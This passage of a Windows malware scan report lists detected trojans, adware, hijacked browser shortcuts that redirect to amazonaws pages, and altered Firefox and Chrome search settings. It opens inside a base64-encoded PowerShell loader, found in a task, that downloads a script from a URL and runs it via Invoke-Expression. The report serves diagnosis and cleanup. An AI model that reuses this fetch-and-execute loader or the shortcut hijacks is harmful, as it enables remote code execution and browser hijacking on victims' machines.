SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=) -> Found
[VT.Adware.DNSUnlocker] \{B34275DF-522B-ABBD-96F4-99C8A879C27F} -- C:\Windows\system32\regsvr32.exe (/s /n /i:"/rt" "C:\PROGRA~2\c549e271\a7249385.dll") -> Found
[Tr.Gen1] \{FEF0E586-495B-522D-86F6-768CFFA141A9} -- C:\ProgramData\{41D40D87-F67F-BA2C-FBCD-4EB281B76623}\B04EC631-07E5-719A-5F40-B64EC22E9D69.exe (/run) -> Found

¤¤¤ Files : 20 ¤¤¤
[Tr.Gen1][File] C:\ProgramData\{41D40D87-F67F-BA2C-FBCD-4EB281B76623}\B04EC631-07E5-719A-5F40-B64EC22E9D69.exe -> Found
[Tr.Gen1][File] C:\ProgramData\{973B1259-2090-A5F2-67ED-53AF72919BE6}\D5A2F8D5-6209-4F7E-2209-796E5E406242.exe -> Found
[Hj.Shortcut][File] C:\Users\Abokr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://sa-aaa.s3-website-eu-west-1.amazonaws.com/?grp=6 -> Found
[Hj.Shortcut][File] C:\Users\Abokr\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe https://s3.amazonaws.com/amazo/RNND/sCH8nO.html -> Found
[PUP.HackTool][Folder] C:\Windows\AutoKMS -> Found
[PUP.DriverPack][Folder] C:\Users\Abokr\AppData\Roaming\DRPSu -> Found
[PUP.Gen1][Folder] C:\Users\Abokr\AppData\Roaming\Easeware -> Found
[PUP.MalwareProtection|PUP.Gen1][Folder] C:\Users\Abokr\AppData\Local\MalwareProtectionLive -> Found
[PUP.Gen1][Folder] C:\Users\Abokr\AppData\Local\TNT2 -> Found
[Tr.Gen1][File] C:\ProgramData\{41D40D87-F67F-BA2C-FBCD-4EB281B76623}\B04EC631-07E5-719A-5F40-B64EC22E9D69.exe -> Found
[Tr.Gen1][File] C:\ProgramData\{973B1259-2090-A5F2-67ED-53AF72919BE6}\D5A2F8D5-6209-4F7E-2209-796E5E406242.exe -> Found
[PUP.Gen1][Folder] C:\Program Files\DNS Unlocker -> Found
[PUP.Gen1][Folder] C:\Program Files\Easeware -> Found
[PUP.Gen3][File] C:\Program Files\Mozilla Firefox\dbghelp.dll -> Found
[PUP.Gen1][Folder] C:\Program Files\ReactorExtender -> Found
[PUP.RelevantKnowledge|PUP.Gen1][Folder] C:\Program Files\RelevantKnowledge -> Found
[PUP.Gen1][Folder] C:\Program Files\Super Optimizer -> Found
[PUP.Gen3][File] C:\Users\Abokr\AppData\Roaming\Mozilla\Firefox\Profiles\5m5js1tf.default\searchplugins\yahoo_ff.xml -> Found
[PUP.Gen3][File] C:\Users\Abokr\AppData\Roaming\Mozilla\Firefox\Profiles\fwf375pk.default\searchplugins\yahoo_ff.xml -> Found
[Hj.Shortcut][File] C:\Users\Abokr\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://sa-aaa.s3-website-eu-west-1.amazonaws.com/?grp=6 -> Found

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 5 ¤¤¤
[PUP.Gen2][Firefox:Addon] c6gs1yl5.default-1377986054771 : Fast Video Download [{c50ca3c4-5656-43c2-a061-13e717f73fc8}] -> Found
[PUP.Gen2][Firefox:Addon] c6gs1yl5.default-1377986054771 : 1-Click Dailymotion Video Download [DailymotionVideoDownloader@PeterOlayev.com] -> Found
[PUP.Gen1|PUM.HomePage][Firefox:Config] c6gs1yl5.default-1377986054771 : user_pref("browser.startup.homepage", "http://search.gboxapp.com/"); -> Found
[PUM.SearchEngine][Firefox:Config] c6gs1yl5.default-1377986054771 : user_pref("browser.search.selectedEngine", "VenteeRo"); -> Found
[PUM.SearchPage][Chrome:Config] Default [SecurePrefs] : default_search_provider_data.template_url_data.keyword [yahoo.com Search] -> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD5000AAKX-001CA0 ATA Device +++++
--- User ---
[MBR] f8b4df7efdab5d447d8ef8b0b2553b13
[BSP] 186beaa8b76a763f282fd658a688e921 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 309900 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 634882048 | Size: 166936 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

Signaler le contenu de ce document